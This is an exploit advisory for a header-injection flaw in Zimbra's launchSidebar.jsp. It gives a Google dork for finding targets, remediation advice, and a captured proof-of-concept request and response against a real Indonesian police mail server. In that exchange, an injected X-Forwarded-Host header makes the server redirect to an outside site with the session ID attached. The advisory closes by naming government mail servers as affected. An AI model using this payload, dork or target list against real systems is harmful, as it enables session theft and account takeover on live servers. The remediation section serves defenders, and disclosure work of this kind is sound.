#############################################################
# Exploit Title: Zimbra - Request URL Override Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung
# Google Dork: inurl:/public/launchSidebar.jsp
# Software Vendor: Zimbra
# Software Version: *
# Software Link: https://www.zimbra.com/downloads
# Date: 2022-05-09
#############################################################
[*] About:
----------
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client.
#############################################################
[*] Detail:
-----------
Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request.
Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries.
Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy enabling localised cache poisoning.
The application appears to support the use of a custom HTTP header to override the Host header.
Attacker added the following headers to the request:
X-Forwarded-Host: cxsecurity.com
A value from these headers was reflected in the response, showing that a header was processed.
#############################################################
[*] Impact:
-----------
This Zimbra vulnerability leaks users' cookies when they are redirected to a malicious site, allowing attackers to take over accounts via session (See value of response header "location").
#############################################################
[*] Remediation:
----------------
To fully resolve this issue, locate the component that processes the affected headers, and disable it entirely. If you are using a framework, applying any pending security updates may do this for you.
If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed.
#############################################################
[*] PoC:
--------
# Request:
GET /public/launchSidebar.jsp HTTP/2
Host: mail.polri.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
X-Forwarded-Host: cxsecurity.com
Pragma: no-cache
Cache-Control: no-cache
TE: trailers
# Response:
HTTP/2 302 Found
server: nginx
date: Mon, 09 May 2022 04:48:53 GMT
content-type: text/html;charset=utf-8
content-length: 0
strict-transport-security: max-age=31536000
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-robots-tag: noindex
x-frame-options: SAMEORIGIN
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, max-age=0
pragma: no-cache
set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/
location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
X-Firefox-Spdy: h2
#############################################################
[*] Affected:
--------------
https://mail.polri.go.id/public/launchSidebar.jsp
https://mail.kejaksaan.go.id/public/launchSidebar.jsp
And other vital Indonesian websites.